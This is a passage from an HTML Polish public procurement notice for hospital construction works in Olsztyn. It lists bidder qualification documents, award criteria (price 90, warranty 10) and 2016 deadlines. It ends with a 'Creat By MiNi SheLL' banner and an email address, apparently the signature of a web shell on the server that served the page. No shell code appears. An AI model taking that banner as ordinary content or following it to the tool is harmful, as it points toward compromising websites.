2.W sytuacji wynikającej z art. 26 ust. 2b - pisemnego zobowiązania podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
3.Jeżeli wykonawca, wskazując spełnianie warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b  ustawy,  Zamawiający w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny czy stosunek łączący Wykonawcy z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów,  żąda
3.1.W odniesieniu do warunku określonego w art. 22. Ust. 1. pkt 2. ustawy pzp przedłożenia dokumentów potwierdzających zakres dostępnych Wykonawcy zasobów innego podmiotów o których mowa w rozdz. VI lit. A, pkt 1. ppkt 1.2.
3.2.W odniesieniu do warunku określonego w art. 22. Ust. 1 pkt 2 ustawy pzp dokumentu dotyczącego sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia.
4. Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów dotyczących zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w zakresie tego warunku nie wyznacza szczegółowych warunków udziału w
postępowaniu.W celu wykazania spełniania przez wykonawców warunków, o których mowa w art. 22 ust.1 zamawiający żąda oświadczenia z art. 22 ust. 1 pkt. 1-4
o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w zakresie tego warunku nie wyznacza szczegółowych warunków udziału w
postępowaniu.W celu wykazania spełniania przez wykonawców warunków, o których mowa w art. 22 ust.1 zamawiający żąda oświadczenia z art. 22 ust. 1 pkt. 1-4
o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający na potwierdzenie spełniania tego warunku wymagane jest posiadanie środków własnych lub zdolności kredytowej na kwotę nie mniejszą niż 1 000 000,00 zł.Ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w Rozdz. VI A pkt. 1. ppkt 1.3.tj.: 1.3.	Informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, na kwotę nie mniejszą niż 1 000 000,00 zł.
2.W sytuacji wynikającej z art. 26 ust. 2b - pisemnego zobowiązania podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
3.Jeżeli wykonawca, wskazując spełnianie warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b  ustawy,  Zamawiający w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny czy stosunek łączący Wykonawcy z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów,  żąda
3.1.W odniesieniu do warunku określonego w art. 22. Ust. 1 pkt 4 ustawy pzp. przedłożenia informacji, o której mowa w rozdz. VI lit. A, pkt 1. ppkt 1.3
3.2. W odniesieniu do warunku określonego w art. 22. Ust. 1 pkt 4 ustawy pzp dokumentu dotyczącego sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia
4.Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów dotyczących zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty dodatkowe:
1.	Sporządzony i podpisany przez wykonawcę, według wzoru stanowiącego załącznik nr 1 do SIWZ, Formularz ofertowy.
2.	Dwa egzemplarze Kosztorysów ofertowych (oryginał i kopia) UWAGA!!! Zaleca się, aby kosztorys ofertowy był załączony do oferty również w wersji elektronicznej na płycie CD/DVD/Pamięci flash
3.	Dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Postanowienia umowy oraz warunki zmian, zawarto we wzorze umowy, który stanowi załączniki numer 2 do SIWZ.
2.	 Wszelkie zmiany zapisów umowy (w tym zmiany istotne) winny być dokonywane w formie pisemnej (aneksu do umowy).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Szpital Zespolony 
Dział Zaopatrzenia i Zamówień Publicznych, pok. 25
ul. Niepodległości 44
10 - 045 Olszyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2016 godzina 10:30, miejsce: Miejski Szpital Zespolony 
ul. Niepodległości 44
10 - 045 Olsztyn
Sekretariat w Budynku Administracji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Zamawiający wyklucza z postępowania o udzielenie zamówienia wykonawcę, który 
w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia
2. Wykonawca może zwrócić się do zamawiającego o wyjaśnienie treści specyfikacji istotnych warunków zamówienia. Zamawiający udzieli wyjaśnień niezwłocznie, nie później niż na 2 dni  przed upływem terminu składania ofert, pod warunkiem, że wniosek o wyjaśnienie treści specyfikacji istotnych warunków zamówienia  wpłynął do zamawiającego nie później niż do końca dnia, w którym upływa połowa wyznaczonego terminu składania ofert, tj. do 1 marca 2016 r. (art. 38 ust.1).
3. Zamawiający wyznacza termin na spotkanie z Wykonawcami na dzień 26 lutego 2016 r. na godzinę 9:00 przy biurze Z-cy Dyrektora ds. Technicznych (ul. Niepodległości 44).  W trakcie spotkania będzie możliwość przeprowadzenie wizji lokalnej.
4. Inwestycja dofinansowana ze środków Mechanizmu Finansowego EOG 2009- 2014 i Norweskiego Mechanizmu Finansowego 2009-2014. Umowa nr 022/300/7/MF EOG NMF /2014/00/638/1065 w sprawie Projektu NR 300/07/13 pt. Poprawa opieki perinatalnej gwarancją zdrowia społeczności subregionu olsztyńskiego . 
5. Zamawiający żąda wskazania przez wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com